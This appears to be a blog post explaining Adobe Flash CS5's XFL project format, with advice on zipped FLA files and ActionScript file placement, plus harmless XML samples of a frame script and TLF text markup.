The XFL file format is a way to represent a Flash Professional document as an XML-based, open folder of files. See the image below for an example of the XFL folder structure. You will notice that there is a file called DOMDocument.xml. This file is the heart of your project. Inside it you will see all of the information for your document including timelines, actions, motion paths, etc. You can edit this information and your changes will automatically take effect when you launch the file. One handy use for this is doing a search and replace across a large number of Flash documents to change strings or colors without having to go into each one and making the changes.
The new FLA format
As I mentioned before, you can still create an FLA file in Flash CS5 rather than the open XFL folder structure. But this new FLA is simply a zipped up version of that open folder structure. If you change the extension to .zip and then unzip it, you will find the same open structure. The new FLA is not an impenetrable binary black box like its predecessor. If you really want the old FLA, you need to save it as a Flash CS4 FLA.
Saving AS source files
One thing that has been tripping people up is where to put source files in relation to XFL folder structure. It might seem to make the most sense to put your external ActionScript files inside the project folder that is created. So let’s say that I create a new Flash document and save it to the desktop as foo.xfl. Flash will actually then create a folder called foo on the desktop. Inside of that folder is the XFL project file and the other folders that make up the project. But you CANNOT place ActionScript source files inside of this folder. You need to instead save them alongside the top-level folder of your project. So in this example I would save my ActionScript source files onto the desktop next to the foo folder.
Save and Compact?
You may notice that there is no longer an option to save and compact your FLA files. This is because the new FLA format is simply a zipped version of the open XFL structure so the binary compacting is no longer an option.
Update: we do plan on releasing the XML schema for the XFL format to allow others to create and edit the project format themselves. I will look into a time estimate for this.
Update 2: below is an example of how a frame script appears in the DomDocument.xml file.
12
3
4
5
6
7
<frames>
<DOMFrame index="0" keyMode="9728">
<Actionscript>
<script><![CDATA[trace("hello world");]]></script>
</Actionscript>
</DOMFrame>
</frames>
Update 3: below is an example of the TLF markup text from the DomDocument.xml file. You can use this as a template for creating dynamic TLF text.
12
3
4
5
6
7
8
9
10
11
<DOMTLFText name="" selected="true" right="8700" bottom="6059">
<matrix>
<Matrix tx="60" ty="47"/>
</matrix>
<tlfFonts>
<TLFFont platformName="Minion Pro" psName="MinionPro-Regular"/>
</tlfFonts>
<markup>
<tlfTextObject type="Paragraph" editPolicy="readSelect" columnCount="1" columnGap="20" verticalAlign="top" firstBaselineOffset="auto" paddingLeft="2" paddingTop="2" paddingRight="2" paddingBottom="2" background="false" backgroundColor="#ffffff" backgroundAlpha="1" border="false" borderColor="#000000" borderAlpha="1" borderWidth="1" paddingLock="false" multiline="true" antiAliasType="normal" embedFonts="false"><TextFlow blockProgression="tb" columnCount="inherit" columnGap="inherit" columnWidth="inherit" lineBreak="inherit" locale="en" paddingBottom="inherit" paddingLeft="inherit" paddingRight="inherit" paddingTop="inherit" verticalAlign="inherit" whiteSpaceCollapse="preserve" xmlns="http://ns.adobe.com/textLayout/2008"><p direction="ltr" paragraphEndIndent="0" paragraphSpaceAfter="0" paragraphSpaceBefore="0" paragraphStartIndent="0" textAlign="start" textAlignLast="start" textIndent="0" textJustify="interWord"><span color="#000000" fontFamily="Minion Pro" fontSize="12" fontStyle="normal" fontWeight="normal" kerning="on" lineHeight="120%" textAlpha="1" textRotation="auto" trackingRight="0%">This is some TLF text.</span></p></TextFlow></tlfTextObject>
</markup>
</DOMTLFText>
Lee
Recent blog posts
- Free File Synchronization Utilities
- ActionScript 3 speed optimization
- Adobe CS5 New Features
- How to create a web site icon
- New Reason Refill Released - Auditory Vortex - Thor Vol. 1
- Flash and AIR Debugger, Open Source
- Hard Drive Visualizer
- Free Media Player Released - Open Source VLC
- Flash Actionscript Editor: Flex Builder vs. FlashDevelop
- Free Font Viewer
Syndicate
